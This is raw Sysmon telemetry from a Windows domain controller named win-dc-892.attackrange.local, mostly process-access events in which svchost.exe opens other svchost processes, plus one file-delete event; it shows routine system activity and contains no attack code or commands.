12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.519{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.488{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 